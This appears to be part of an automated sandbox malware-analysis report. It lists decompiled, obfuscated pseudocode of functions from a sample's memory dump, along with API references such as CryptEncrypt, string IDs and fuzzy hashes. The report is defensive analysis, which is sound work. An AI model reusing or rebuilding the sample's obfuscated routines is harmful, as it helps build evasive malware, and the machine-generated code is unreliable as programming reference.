                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: B5d$CIRCoInst.dll$ZwLoadKeyEx
                                                          • API String ID: 0-4279915688
                                                          • Opcode ID: cf18c908850012e72c8a4b642295ba37e9c1c57233eecf103e095446b7dbe5be
                                                          • Instruction ID: 34d739725143ffc51c2220718e8d30f1ae70247657a9a8b10f7120b27db9c74a
                                                          • Opcode Fuzzy Hash: cf18c908850012e72c8a4b642295ba37e9c1c57233eecf103e095446b7dbe5be
                                                          • Instruction Fuzzy Hash: AC51F379A407428FCB00DF7EEC45BDD3BB1EF75320F04416A9884A7362E6794549E726
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004DA07A Relevance: 3.8, Strings: 3, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E004DA07A(char __eax, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _t15;
				char _t18;
				signed int _t25;
				intOrPtr _t28;
				void* _t30;
				signed char _t37;
				signed short _t38;
				short _t39;
				short _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t53;

				_t50 = __esi;
				_t45 = __edi;
				_t41 = __edx;
				_t37 = __edx;
				 *0x50859b =  *0x50859b + __edi;
				if((__edx & 0x00000098) != 0) {
					_t41 = __edx - 1;
					 *0x508f8b = "wlanmsm.dll";
					_t37 = _t41;
					 *0x50afe5 = __eax;
					 *0x50afd8 =  *0x50afd8 - __eax;
				}
				_t38 = _t37 + 0x88c5;
				_t15 = _t53 - 0x2050;
				 *0x508222 = _t41;
				_t25 =  !("wlanmsm.dll");
				if((_t38 & 0x00007f45) == 0) {
					L5:
					if(_t25 == _t25) {
						goto L6;
					}
				} else {
					_t25 = 0x2c5e62 - _t38;
					_t41 = 0;
					if(_t50 <= 0) {
						L6:
						_t38 = _t38 - _t41;
					} else {
						_t25 =  *0x50afd8; // -16
						goto L5;
					}
				}
				_t51 = _t50 - 1;
				 *0x508dab = _t25;
				_t39 = _t38 + _t38;
				 *((intOrPtr*)(_t53 - 0x20c8)) = _t15;
				 *0x50afe3 =  *0x50afe3 - 0xc6;
				_t18 = _t15;
				if(_t45 - _t15 == 0x70a) {
					_t30 = 0x1474e1;
					if(_t18 >= 0x1eb1) {
						_t30 = 0;
					}
					if(_t30 < _t30) {
						 *0x508100 =  *0x508100 - _t30;
						 *0x508136 = _t39;
					}
					_t39 =  *0x50816c; // 0x28a9
					 *0x5081a2 =  *0x5081a2 - _t39;
					 *0x50972b =  *0x50972b - _t41;
					_t41 =  *0x508206; // 0x94da
				}
				if((_t41 & 0x000000af) > 0) {
					_t51 = _t51 + _t51;
					_t28 =  *0x50afe3; // -68
					 *0x50afe5 = _t18;
					 *0x508030 =  *0x508030 + _t18;
					if(_t18 == 0x1fbc) {
						_t28 = 0x31adc9;
					}
					 *0x508e33 = _t28;
					_t39 = 0x5ed0;
				}
				 *((intOrPtr*)(_t53 - 8)) =  *((intOrPtr*)(_t53 - 8)) - _t39;
				_push( *((intOrPtr*)(_t53 - 0x20c8)));
				_t40 =  *0x508140; // 0x15
				 *0x508192 = _t40;
				_t42 =  *0x5081de; // 0xa5c4
				 *0x509b0b =  *0x509b0b - _t42;
				 *((intOrPtr*)(_t53 - 8)) = _t18;
				_push(1);
				_push(0);
				_push(1);
				_push(E004DA1F8);
				_push(E004B009D);
				return _t18;
			}

















                                                          0x004da07a
                                                          0x004da07a
                                                          0x004da07a
                                                          0x004da07a
                                                          0x004da083
                                                          0x004da092
                                                          0x004da0a4
                                                          0x004da0aa
                                                          0x004da0b0
                                                          0x004da0b3
                                                          0x004da0b9
                                                          0x004da0bf
                                                          0x004da0c1
                                                          0x004da0c6
                                                          0x004da0cc
                                                          0x004da0e5
                                                          0x004da0ec
                                                          0x004da104
                                                          0x004da106
                                                          0x00000000
                                                          0x00000000
                                                          0x004da0ee
                                                          0x004da0f6
                                                          0x004da0f8
                                                          0x004da0fc
                                                          0x004da108
                                                          0x004da108
                                                          0x004da0fe
                                                          0x004da0fe
                                                          0x00000000
                                                          0x004da0fe
                                                          0x004da0fc
                                                          0x004da10b
                                                          0x004da10f
                                                          0x004da115
                                                          0x004da118
                                                          0x004da129
                                                          0x004da133
                                                          0x004da139
                                                          0x004da13b
                                                          0x004da144
                                                          0x004da146
                                                          0x004da146
                                                          0x004da14b
                                                          0x004da14d
                                                          0x004da154
                                                          0x004da154
                                                          0x004da15e
                                                          0x004da165
                                                          0x004da16c
                                                          0x004da175
                                                          0x004da175
                                                          0x004da17f
                                                          0x004da181
                                                          0x004da183
                                                          0x004da189
                                                          0x004da197
                                                          0x004da1a2
                                                          0x004da1aa
                                                          0x004da1aa
                                                          0x004da1af
                                                          0x004da1b7
                                                          0x004da1b7
                                                          0x004da1bb
                                                          0x004da1be
                                                          0x004da1c4
                                                          0x004da1cb
                                                          0x004da1d5
                                                          0x004da1dc
                                                          0x004da1e4
                                                          0x004da1e7
                                                          0x004da1e9
                                                          0x004da1eb
                                                          0x004da1ed
                                                          0x004da1f2
                                                          0x004da1f7

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: IsTopLevelWindow$b^,$wlanmsm.dll
                                                          • API String ID: 0-4194069097
                                                          • Opcode ID: 48dfd037b0282bc786cd7866a95f85aad3cc1fa3089a5ea49167897dac4de42d
                                                          • Instruction ID: a95459f7d239d6da1477d81566fcff6eecb4a31fefa5694fec8c53e908126158
                                                          • Opcode Fuzzy Hash: 48dfd037b0282bc786cd7866a95f85aad3cc1fa3089a5ea49167897dac4de42d
                                                          • Instruction Fuzzy Hash: DD31E1756047528BC320DF35ECA8AEE3B71EB3D320B04026BC998937A7E6750948E749
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004EE626 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E004EE626() {
				signed char _t23;
				char _t24;
				intOrPtr _t25;
				void* _t28;
				intOrPtr _t38;
				intOrPtr _t55;
				short _t56;
				intOrPtr _t66;
				signed char _t71;
				void* _t72;
				signed int _t80;
				void* _t81;

				_t23 = 0;
				_t71 =  *0x5081b4; // 0x19f4
				if((_t71 & 0x00000096) < 0) {
					 *0x509a5f =  *0x509a5f + _t71;
					_t71 =  *0x508238; // 0x5364
					if((_t80 & 0x00a78b71) >= 0) {
						 *0x508349 =  *0x508349 + _t80;
					}
					_t23 = 0xfffffffffff317fd;
				}
				 *0x50883f =  *0x50883f + _t23;
				 *0x508967 = _t23;
				_push(8);
				 *0x50afda =  *0x50afda - _t28;
				_t55 =  *0x508170; // 0x2575
				_t56 = _t55 - 0x81;
				_t24 = _t81 - 0x20;
				if(_t28 != _t28) {
					L6:
					 *0x50822c = _t71;
					goto L7;
				} else {
					_t66 =  *0x50813e; // 0x7e29
					_t56 = _t66 - 0x6a;
					 *0x50818e = _t56;
					_t71 = 0;
					if(0 >= 0) {
						L7:
						 *0x50afe5 = _t24;
						 *((intOrPtr*)(_t81 - 0x18)) = _t24;
						if(_t24 < 0) {
							 *0x50afdc =  *0x50afdc + 0x4318ca;
							if(0x4318ca > _t56) {
								_t56 = 0x723c;
								 *0x5081ae = _t71;
								_t71 = 0x99a8;
								 *0x50afe1 = _t24;
								if(_t80 == 0) {
									 *0x50a9c2 =  *0x50a9c2 + _t80;
								}
								 *0x50afe5 = _t24;
							}
							 *0x508028 =  *0x508028 - _t24;
							 *((intOrPtr*)(_t81 - 8)) = 4 - _t24 + 0x2470;
						}
						_push( *((intOrPtr*)(_t81 - 0x18)));
						_t72 = _t71 + 1;
						 *0x50afe1 = _t24;
						 *((intOrPtr*)(_t81 - 8)) = _t24;
						_t25 =  *((intOrPtr*)(_t81 - 8));
						 *0x508837 = _t25;
						if(_t25 >= 0x2908b8) {
							_t38 = "diskperf.exe" - 1;
							 *((intOrPtr*)(_t81 - 8)) = _t38;
							 *((intOrPtr*)(_t81 - 8)) = _t38;
						}
						 *((intOrPtr*)(_t81 - 8)) = _t25;
						 *((intOrPtr*)(_t81 - 0xc)) =  *((intOrPtr*)(_t81 - 0xc)) - 0x64f0;
						_push(1);
						_push(_t72 + _t72);
						_push(E004EE7C8);
						goto __edx;
					}
					goto L6;
				}
			}















                                                          0x004ee63a
                                                          0x004ee63d
                                                          0x004ee647
                                                          0x004ee649
                                                          0x004ee64f
                                                          0x004ee65e
                                                          0x004ee660
                                                          0x004ee660
                                                          0x004ee673
                                                          0x004ee673
                                                          0x004ee678
                                                          0x004ee67e
                                                          0x004ee683
                                                          0x004ee685
                                                          0x004ee692
                                                          0x004ee699
                                                          0x004ee69c
                                                          0x004ee6a1
                                                          0x004ee6bd
                                                          0x004ee6bd
                                                          0x00000000
                                                          0x004ee6a3
                                                          0x004ee6a3
                                                          0x004ee6aa
                                                          0x004ee6ad
                                                          0x004ee6b4
                                                          0x004ee6bb
                                                          0x004ee6c4
                                                          0x004ee6d2
                                                          0x004ee6d7
                                                          0x004ee6dd
                                                          0x004ee6fe
                                                          0x004ee707
                                                          0x004ee70b
                                                          0x004ee70f
                                                          0x004ee719
                                                          0x004ee71d
                                                          0x004ee72b
                                                          0x004ee72d
                                                          0x004ee72d
                                                          0x004ee733
                                                          0x004ee738
                                                          0x004ee742
                                                          0x004ee751
                                                          0x004ee754
                                                          0x004ee766
                                                          0x004ee769
                                                          0x004ee76a
                                                          0x004ee77a
                                                          0x004ee78a
                                                          0x004ee792
                                                          0x004ee79c
                                                          0x004ee79e
                                                          0x004ee79f
                                                          0x004ee7a2
                                                          0x004ee7a2
                                                          0x004ee7b0
                                                          0x004ee7b4
                                                          0x004ee7b9
                                                          0x004ee7bb
                                                          0x004ee7bc
                                                          0x004ee7c6
                                                          0x004ee7c6
                                                          0x00000000
                                                          0x004ee6bb

                                                          Strings
                                                          • diskperf.exe, xrefs: 004EE78D
                                                          • Microsoft.Office.Tools.Outlook.v9.0.ni.dll, xrefs: 004EE6EC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Microsoft.Office.Tools.Outlook.v9.0.ni.dll$diskperf.exe
                                                          • API String ID: 0-1461251385
                                                          • Opcode ID: 52551f3e53c6d927bf3cdf5840391c91b33024b5f0452680534ab3d817cf4f74
                                                          • Instruction ID: 2b01366b76d156ca88fb34e13ff27444dd900445018af0040819d1ebb70d9d92
                                                          • Opcode Fuzzy Hash: 52551f3e53c6d927bf3cdf5840391c91b33024b5f0452680534ab3d817cf4f74
                                                          • Instruction Fuzzy Hash: 7341F6B9E407828FCB00DF76EC94AED3BA1FF7A310B04916EC48587366E6340409E746
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004D442B Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E004D442B(char __eax, short __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _t15;
				char _t17;
				intOrPtr _t21;
				signed char _t24;
				intOrPtr _t38;
				short _t39;
				signed int _t43;
				signed short _t44;
				void* _t49;
				void* _t53;
				void* _t56;

				_t53 = __esi;
				_t49 = __edi;
				_t43 = __edx;
				_t39 = __ecx;
				_t14 = __eax;
				if((__edx & 0x000000a8) < 0) {
					 *0x50afe1 =  *0x50afe1 + __eax;
					_t14 =  *0x50afe5; // -1
				}
				 *0x50afe6 = _t14;
				_t15 =  *((intOrPtr*)(_t56 - 8));
				_t26 = 0xe896b;
				_push(_t15);
				 *0x50afd8 =  *0x50afd8 + _t15;
				if(_t15 >= 0x20b5) {
					_t15 = 0x2b7a69;
					_t38 =  *0x508f77; // 0x0
					_t26 = _t38 - 0x61;
					 *0x508172 = _t39;
				}
				E004C1383(_t15, _t26, _t39, _t43, _t49, _t53, 1, 0);
				_t44 = _t43 + 0x91;
				_pop(_t17);
				if((_t44 & 0x00009edc) > 0) {
					_t53 = _t53 + _t53;
					 *0x50afe3 = _t17;
					_t49 = _t49 + 0xc70c1a;
				}
				 *0x50afe6 =  *0x50afe6 - _t17;
				 *((intOrPtr*)(_t56 - 8)) = _t17;
				_push( *0x50ab34);
				_t21 =  *((intOrPtr*)(_t56 - 8));
				 *((intOrPtr*)(_t56 - 8)) = _t21;
				_push(1);
				_push(1);
				L004C1747();
				 *0x50820e = _t44 + 0x7e644c - 0x90;
				 *0x50810c =  *0x50810c + "lyncicon.exe" + "lyncicon.exe" - 0x42;
				 *((intOrPtr*)(_t56 - 8)) =  *((intOrPtr*)(_t56 - 8)) + _t39;
				_push( *((intOrPtr*)(_t56 - 8)));
				_pop(_t24);
				if((_t24 & 0x000000ad) == 0) {
					 *0x50afe5 = 0;
				}
				_push(0x4d453c);
				_push( &M004C4CEF);
				return _t24;
			}














                                                          0x004d442b
                                                          0x004d442b
                                                          0x004d442b
                                                          0x004d442b
                                                          0x004d442b
                                                          0x004d442e
                                                          0x004d4430
                                                          0x004d443e
                                                          0x004d443e
                                                          0x004d4444
                                                          0x004d4449
                                                          0x004d444c
                                                          0x004d4451
                                                          0x004d4452
                                                          0x004d445c
                                                          0x004d445e
                                                          0x004d4466
                                                          0x004d446c
                                                          0x004d446f
                                                          0x004d446f
                                                          0x004d447a
                                                          0x004d447f
                                                          0x004d4482
                                                          0x004d4488
                                                          0x004d448a
                                                          0x004d448f
                                                          0x004d4495
                                                          0x004d4495
                                                          0x004d449b
                                                          0x004d44a1
                                                          0x004d44b0
                                                          0x004d44cc
                                                          0x004d44d0
                                                          0x004d44d3
                                                          0x004d44d5
                                                          0x004d44d7
                                                          0x004d44dc
                                                          0x004d4502
                                                          0x004d4509
                                                          0x004d4516
                                                          0x004d451b
                                                          0x004d451f
                                                          0x004d4527
                                                          0x004d452c
                                                          0x004d4531
                                                          0x004d4536
                                                          0x004d453b

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: iz+$lyncicon.exe
                                                          • API String ID: 0-3828082457
                                                          • Opcode ID: f60200b8202b3f7cae140783b9d13f190544db0958ee5a0a2be1381f855351b8
                                                          • Instruction ID: 9dbf6c66456e8875c4ceee5dcf41c381c2cb3305cf0de791d2bad3734108df17
                                                          • Opcode Fuzzy Hash: f60200b8202b3f7cae140783b9d13f190544db0958ee5a0a2be1381f855351b8
                                                          • Instruction Fuzzy Hash: D32124BAA447819FC701CF78EC65FCD3B60DB72324F08515BA890A73E3E2790549AB16
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00467A70 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E00467A70(short __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v12;
				char _t9;
				char _t10;
				signed int _t23;
				void* _t42;
				signed short _t43;

				_t42 = __edi;
				_t31 = __ecx;
				if(((__edx | 0x0000008a) & 0x000097af) <= 0) {
					L3:
					_t9 =  *0x50afe1; // -128
					 *0x50afe3 = _t9;
					_t43 = _t42 + _t42;
					_t10 =  *0x50afe6; // -97
					if(_t10 <= 0) {
					}
					L5:
					 *0x50808c =  *0x50808c - _t23;
					_v12 = _v12 - _t23;
					 *0x50afdd =  *0x50afdd - _t31;
					 *0x5097db =  *0x5097db + 0x821e;
					 *0x50afe3 = 0x1fd84c;
					if((_t43 & 0x0050835f) > 0) {
					}
					 *0x50afe6 = 0x1fd84c;
					 *0x50805a =  *0x50805a + "diskperf.exe";
					 *0x50afdc =  *0x50afdc - 0x35fef1;
					return 0;
				}
				 *0x509d4f =  *0x509d4f - __esi;
				 *0x5086c5 =  *0x5086c5 - __edi;
				_t43 = 0;
				 *0x50afd8 =  *0x50afd8 - 0x9b1a6;
				_t23 = "EnumWindowStationsA" & 0x000049e2;
				_t31 = __ecx - 0x577a7e;
				 *0x508176 = _t31;
				 *0x508194 = _t31;
				if(0x8541 >= 0) {
					goto L5;
				}
				 *0x508210 = 0x90d8;
				goto L3;
			}









                                                          0x00467a70
                                                          0x00467a70
                                                          0x00467a84
                                                          0x00467af9
                                                          0x00467af9
                                                          0x00467b04
                                                          0x00467b0a
                                                          0x00467b0d
                                                          0x00467b15
                                                          0x00467b15
                                                          0x00467b19
                                                          0x00467b23
                                                          0x00467b2a
                                                          0x00467b3b
                                                          0x00467b52
                                                          0x00467b65
                                                          0x00467b74
                                                          0x00467b74
                                                          0x00467b7c
                                                          0x00467b8d
                                                          0x00467b9e
                                                          0x00467ba5
                                                          0x00467ba5
                                                          0x00467a8a
                                                          0x00467aa0
                                                          0x00467aaa
                                                          0x00467ab2
                                                          0x00467ac8
                                                          0x00467ad0
                                                          0x00467ad6
                                                          0x00467add
                                                          0x00467aea
                                                          0x00000000
                                                          0x00000000
                                                          0x00467af0
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EnumWindowStationsA$diskperf.exe
                                                          • API String ID: 0-333883692
                                                          • Opcode ID: 7e3f046dd20e9083de6739f81c24637f21c5f492bf4c650f19fd8ff799857cd8
                                                          • Instruction ID: c7a0b663673fd513de0e92068407414154e59e957b308ecf78d36dde6e6931ec
                                                          • Opcode Fuzzy Hash: 7e3f046dd20e9083de6739f81c24637f21c5f492bf4c650f19fd8ff799857cd8
                                                          • Instruction Fuzzy Hash: F321666D6447C28BC700CF39FC58ADD3B71EB35304708456A88D087B77EA26190EEB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004C497F Relevance: 1.5, APIs: 1, Instructions: 26encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptEncrypt.ADVAPI32(?,00000000,00000001,?,00000000,?,00000000), ref: 004C49A6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CryptEncrypt
                                                          • String ID:
                                                          • API String ID: 1352496322-0
                                                          • Opcode ID: 7fbc60aa7d65d1e3df4ab46b86413178a2b0d0e90dc1d9494221a742818a00cf
                                                          • Instruction ID: 9097c1caef0158749b0519874386637e7db78cbb3444d7e22166045a35419d6a
                                                          • Opcode Fuzzy Hash: 7fbc60aa7d65d1e3df4ab46b86413178a2b0d0e90dc1d9494221a742818a00cf
                                                          • Instruction Fuzzy Hash: FBE03975A0022AABDF10CBA1CD19FEF7EB5FB94740F00452EF402B2280DB769904DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004C4C3A Relevance: 1.5, APIs: 1, Instructions: 23encryptionCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E004C4C3A(BYTE* _a4, int _a8) {
				char _v8;
				DWORD* _v12;
				char* _v20;
				int _t10;

				_v20 = 0;
				_v12 =  &_v8;
				_t10 = CryptBinaryToStringA(_a4, _a8, 1, 0, _v12);
				if(_t10 == 0) {
					return _v20;
				} else {
					_push(_v8);
					_push(E004C4C79);
					_push(E004A873F);
					return _t10;
				}
			}







                                                          0x004c4c40
                                                          0x004c4c4a
                                                          0x004c4c61
                                                          0x004c4c69
                                                          0x004c4cec
                                                          0x004c4c6b
                                                          0x004c4c6b
                                                          0x004c4c6e
                                                          0x004c4c73
                                                          0x004c4c78
                                                          0x004c4c78

                                                          APIs
                                                          • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 004C4C61
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: BinaryCryptString
                                                          • String ID:
                                                          • API String ID: 80407269-0
                                                          • Opcode ID: e3050fd146b8024631d0110c422364e65041b2c447adf0ce6e1444639b44a423
                                                          • Instruction ID: 4dd88b82a2e420a0927c0580e097f437135fdb11b71fc8c9ec856c437501c572
                                                          • Opcode Fuzzy Hash: e3050fd146b8024631d0110c422364e65041b2c447adf0ce6e1444639b44a423
                                                          • Instruction Fuzzy Hash: F5E09239A00109BBDF00CF90CD45FCE7BB5FB50700F610025B414A22E0E7758A10EB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B602D Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004B602D() {
				char _v20;
				struct _SYSTEMTIME* _v24;
				struct _SYSTEMTIME* _t4;

				_t4 =  &_v20;
				_v24 = _t4;
				GetLocalTime(_v24);
				return _t4;
			}






                                                          0x004b6033
                                                          0x004b6036
                                                          0x004b603c
                                                          0x004b6042

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID:
                                                          • API String ID: 481472006-0
                                                          • Opcode ID: 4a7b0feb7542fa2ccbc58ac8c935e19584b1d26fb0435ec7f987aa014bb7eb5b
                                                          • Instruction ID: e751708e558e307253df805dc366075d31e218175f6ee47b213e872804cb8d8a
                                                          • Opcode Fuzzy Hash: 4a7b0feb7542fa2ccbc58ac8c935e19584b1d26fb0435ec7f987aa014bb7eb5b
                                                          • Instruction Fuzzy Hash: 46C04C7080060E4BCB00DB959D469AFB6B8AA40214F5005719911B12D1E7A19F108AE6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0048E980 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 36%
                                                          			E0048E980(intOrPtr __eax, void* __ebx, signed int __ecx, short __esi) {
				intOrPtr _t25;
				char _t29;
				char _t31;
				short _t66;
				signed short _t67;
				void* _t70;
				short _t72;
				void* _t75;

				_t72 = __esi;
				_t55 = __ecx;
				 *((intOrPtr*)(_t75 - 8)) = __eax;
				if(__eax < 0x2242f2) {
					 *((intOrPtr*)(_t75 - 0x10)) = __ecx;
					_t55 = 0x6d29;
					 *0x50afde =  *0x50afde + 0x6d29;
				}
				E00465B85(_t72, 1, _t55);
				_t65 = 0x50afe0;
				 *0x50823a = _t72;
				_t25 =  *((intOrPtr*)(_t75 - 8));
				 *((intOrPtr*)(_t75 - 0x2c)) = _t25;
				_push( *((intOrPtr*)(_t75 - 0x2c)));
				_t70 = 0x50af30;
				 *((intOrPtr*)(_t75 - 8)) = _t25;
				 *((intOrPtr*)(_t75 - 0xc)) = 0x333714;
				_t29 =  *((intOrPtr*)(_t75 - 8));
				if(0x333714 < 0x2d14b1) {
					L5:
					goto L6;
				} else {
					_t55 = 0x73;
					 *0x5081e0 = 0x50afe0;
					_t65 = 0xa888;
					 *0x50afe3 = _t29;
					 *0x5086c7 =  *0x5086c7 - 0x50af30;
					 *0x50afe6 =  *0x50afe6 + _t29;
					if(0x50af30 != 0) {
						L6:
						if(0x3516d2 >= 0x3516d2) {
							_t55 = 0x00006a80 >> 0x00006a80 ^ _t65;
						}
						_t66 = _t65 + 0x91ec;
						_push( *0x5084c3);
						 *((intOrPtr*)(_t75 - 8)) = _t29;
						if(_t29 <= 0x25a1) {
							L13:
							_t67 = _t66 - 1;
							if((_t67 & 0x00000097) > 0) {
								goto L16;
							}
							goto L14;
						} else {
							if(0 > 0x36f690) {
								 *((intOrPtr*)(_t75 - 0x10)) =  *((intOrPtr*)(_t75 - 0x10));
								 *0x508118 = _t55;
							}
							 *0x5081b8 = _t66;
							_t67 = _t66 + 0x84bf69 - 0x9e;
							if((_t67 & 0x000000ae) >= 0) {
								L14:
								if((_t67 & 0x00009cf1) > 0) {
									_t29 =  *0x50afe1; // -128
									 *0x50afe3 = _t29;
									_t70 = _t70 - 0xdc04;
								}
								L16:
								 *0x5086f3 =  *0x5086f3 - _t70;
								 *0x50afe6 = _t29;
								_push(0x48eb18);
								_push( *0x5087b7);
								return  *((intOrPtr*)(_t75 - 8));
							} else {
								_t31 =  *0x50afe3; // -68
								 *0x50afe5 = _t31;
								_t70 = _t70 - 0xd99a83 + 0x723;
								 *0x50858f = _t31;
								_t29 =  *0x50897b;
								 *((intOrPtr*)(_t75 - 0xc)) = 1;
								goto L13;
							}
						}
					}
					goto L5;
				}
			}











                                                          0x0048e980
                                                          0x0048e980
                                                          0x0048e980
                                                          0x0048e988
                                                          0x0048e994
                                                          0x0048e99a
                                                          0x0048e99e
                                                          0x0048e99e
                                                          0x0048e9a7
                                                          0x0048e9af
                                                          0x0048e9b5
                                                          0x0048e9be
                                                          0x0048e9c1
                                                          0x0048e9c6
                                                          0x0048e9c9
                                                          0x0048e9d1
                                                          0x0048e9df
                                                          0x0048e9ec
                                                          0x0048e9f5
                                                          0x0048ea44
                                                          0x00000000
                                                          0x0048e9f7
                                                          0x0048ea08
                                                          0x0048ea0b
                                                          0x0048ea18
                                                          0x0048ea1e
                                                          0x0048ea2b
                                                          0x0048ea32
                                                          0x0048ea3c
                                                          0x0048ea48
                                                          0x0048ea50
                                                          0x0048ea5d
                                                          0x0048ea5d
                                                          0x0048ea5f
                                                          0x0048ea64
                                                          0x0048ea6a
                                                          0x0048ea71
                                                          0x0048ead3
                                                          0x0048eadf
                                                          0x0048eae3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0048ea73
                                                          0x0048ea7b
                                                          0x0048ea7d
                                                          0x0048ea80
                                                          0x0048ea8e
                                                          0x0048ea92
                                                          0x0048ea9f
                                                          0x0048eaa5
                                                          0x0048eae5
                                                          0x0048eaea
                                                          0x0048eaec
                                                          0x0048eaf2
                                                          0x0048eaf8
                                                          0x0048eaf8
                                                          0x0048eafd
                                                          0x0048eafd
                                                          0x0048eb04
                                                          0x0048eb0c
                                                          0x0048eb11
                                                          0x0048eb17
                                                          0x0048eaa9
                                                          0x0048eaa9
                                                          0x0048eaaf
                                                          0x0048eabc
                                                          0x0048eac1
                                                          0x0048eac8
                                                          0x0048eace
                                                          0x00000000
                                                          0x0048eace
                                                          0x0048eaa5
                                                          0x0048ea71
                                                          0x00000000
                                                          0x0048ea3f

                                                          Strings
                                                          • Microsoft.Office.Tools.Outlook.v9.0.ni.dll, xrefs: 0048EA3F
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Microsoft.Office.Tools.Outlook.v9.0.ni.dll
                                                          • API String ID: 0-2731971894
                                                          • Opcode ID: de954919ab3d127d668695dc7e0d31a2310241ead96e74d1889034801ddde702
                                                          • Instruction ID: b2d6eb58afd4542b46017ec4b32cd1de28fea4fa86d4ad8a4a70b5a4c34f6716
                                                          • Opcode Fuzzy Hash: de954919ab3d127d668695dc7e0d31a2310241ead96e74d1889034801ddde702
                                                          • Instruction Fuzzy Hash: B441F4B9A403429FCB01EFBADC94ADD7BB1FB38710F04823A885497762D6B90509AB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B89DC Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E004B89DC(intOrPtr __ebx, void* __edx, void* __eflags) {
				intOrPtr _t6;
				void* _t12;
				void* _t15;
				void* _t16;
				void* _t17;

				 *((intOrPtr*)(_t17 - 8)) = __ebx;
				E004AF283(__ebx + __ebx + __ebx + __ebx, _t12, _t15, _t16, 1);
				_t6 =  *0x5083ff; // 0x0
				 *0x50864f =  *0x50864f - _t6;
				 *0x5087e7 =  *0x5087e7 + _t6;
				_push(0);
				_push("api-ms-win-core-sysinfo-l1-1-0.dll");
				_push(E004B8A22);
				_push(E004B4774);
				return 0;
			}








                                                          0x004b89e6
                                                          0x004b89ef
                                                          0x004b8a00
                                                          0x004b8a05
                                                          0x004b8a0b
                                                          0x004b8a14
                                                          0x004b8a16
                                                          0x004b8a17
                                                          0x004b8a1c
                                                          0x004b8a21

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
